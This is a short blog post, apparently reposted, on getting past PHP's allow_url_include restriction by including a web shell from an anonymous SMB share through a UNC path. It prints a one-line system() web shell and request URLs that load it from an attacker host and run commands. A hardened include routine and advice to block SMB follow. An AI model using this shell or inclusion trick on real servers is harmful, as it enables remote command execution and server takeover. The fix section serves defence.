
PHP LFI/RFI Vulnerability attack bypassing remote URL inclusion restriction

Date: 2024-01-17 22:56:05
Tags: bypassing trojan php remote inclusion url allow PHP SMB

File Inclusion vulnerability

In the PHP configuration, the "allow_url_include" directive is set to "Off" by default, which instructs PHP not to load remote HTTP or FTP URLs and so prevents Remote File Inclusion attacks. However, PHP does not block SMB URL loading even if "allow_url_include" and "allow_url_fopen" are both set to "Off". This behavior of PHP can be abused to load a remotely hosted PHP web shell from an SMB share.

Attack scenario outline

The vulnerable PHP application code tries to load a PHP web shell from an attacker-controlled SMB share, which must allow access to the file. The attacker needs to configure the SMB server with anonymous browsing access enabled. Then, when the vulnerable application tries to access the PHP web shell on the SMB share, the SMB server does not ask for any credentials, and the PHP code of the web shell is included by the vulnerable application.

Verification environment

allow_url_fopen = OFF

allow_url_include=off

PHP version=5.5.11

An SMB server running with anonymous access

Exploiting

http://vulnerability_machine_ip/page.php?lang=\\exploit_ip\xxx\xx.php

We can host a PHP script (trojan.php) that calls the system function (a one-sentence trojan), like:

<?php system($_REQUEST[cmd])?>

To use the trojan, we can send a request like the one below:

http://vulnerability_machine_ip/page.php?lang=\\exploit_ip\trojan.php&cmd=whoami

The machine will execute the command.
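Because the two ini settings above do not stop a UNC path from reaching include, the fix belongs in the application code. The following is an added example, not code from the original post: a hardened form of a page that selects its include from the lang parameter. The names LANG_DIR, $ALLOWED_LANGS and resolve_lang_file(), and the lang/ directory layout, are assumptions.

```php
<?php
// Added example (not from the original post): hardened include driven by
// a request parameter such as ?lang=...
// LANG_DIR, $ALLOWED_LANGS and resolve_lang_file() are assumed names.

define('LANG_DIR', __DIR__ . DIRECTORY_SEPARATOR . 'lang');

// Fixed allowlist: the request only selects a key, never a path.
$ALLOWED_LANGS = array('en' => 'en.php', 'fr' => 'fr.php', 'de' => 'de.php');

function resolve_lang_file($requested, array $allowed, $baseDir)
{
    // Accept only a short lowercase token. This drops UNC paths
    // (\\host\share\file.php), drive letters, slashes, dots and stream
    // wrappers before any filesystem function sees the value.
    if (!is_string($requested) || !preg_match('/\A[a-z]{2,8}\z/', $requested)) {
        return false;
    }
    if (!isset($allowed[$requested])) {
        return false;
    }

    // Defence in depth: the resolved file must exist inside the base directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$requested]);
    if ($base === false || $path === false) {
        return false;
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $path;
}

$requested = isset($_GET['lang']) ? $_GET['lang'] : 'en';
$file = resolve_lang_file($requested, $ALLOWED_LANGS, LANG_DIR);

if ($file === false) {
    // Log the rejected value for detection, then fail closed.
    error_log('lang include rejected: ' . json_encode($requested));
    http_response_code(400);
    exit('Unsupported language');
}

include $file;
```

Blocking outbound SMB (TCP 445) from the web server at the network edge removes the remote share path independently of the application fix.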

From: https://www.cnblogs.com/lisenMiller/p/17971392
